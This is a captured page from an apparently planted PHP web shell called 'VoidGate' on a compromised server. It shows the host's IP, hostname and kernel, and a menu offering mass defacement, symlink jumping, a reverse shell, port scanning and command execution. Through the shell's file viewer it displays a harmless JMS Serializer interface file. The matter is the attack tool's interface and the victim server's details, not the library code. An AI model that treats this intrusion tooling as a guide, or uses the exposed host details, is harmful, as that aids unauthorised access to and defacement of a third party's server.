ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
jms
/
serializer
/
src
/
Visitor
/
Viewing: DeserializationVisitorInterface.php
<?php declare(strict_types=1); namespace JMS\Serializer\Visitor; use JMS\Serializer\Metadata\ClassMetadata; use JMS\Serializer\Metadata\PropertyMetadata; use JMS\Serializer\VisitorInterface; /** * Interface for visitors. * * This contains the minimal set of values that must be supported for any * output format. * * @author Johannes M. Schmitt <schmittjoh@gmail.com> * @author Asmir Mustafic <goetas@gmail.com> */ interface DeserializationVisitorInterface extends VisitorInterface { /** * @param mixed $data * @param array $type * * @return null */ public function visitNull($data, array $type); /** * @param mixed $data * @param array $type */ public function visitString($data, array $type): ?string; /** * @param mixed $data * @param array $type */ public function visitBoolean($data, array $type): ?bool; /** * @param mixed $data * @param array $type */ public function visitDouble($data, array $type): ?float; /** * @param mixed $data * @param array $type */ public function visitInteger($data, array $type): ?int; /** * Returns the class name based on the type of the discriminator map value * * @param mixed $data */ public function visitDiscriminatorMapProperty($data, ClassMetadata $metadata): string; /** * @param mixed $data * @param array $type * * @return array<mixed> */ public function visitArray($data, array $type): array; /** * Called before the properties of the object are being visited. * * @param array $type */ public function startVisitingObject(ClassMetadata $metadata, object $data, array $type): void; /** * @param mixed $data * * @return mixed */ public function visitProperty(PropertyMetadata $metadata, $data); /** * Called after all properties of the object have been visited. * * @param mixed $data * @param array $type */ public function endVisitingObject(ClassMetadata $metadata, $data, array $type): object; /** * @param mixed $data * * @return mixed */ public function getResult($data); }
Coded With 💗 by
0x6ick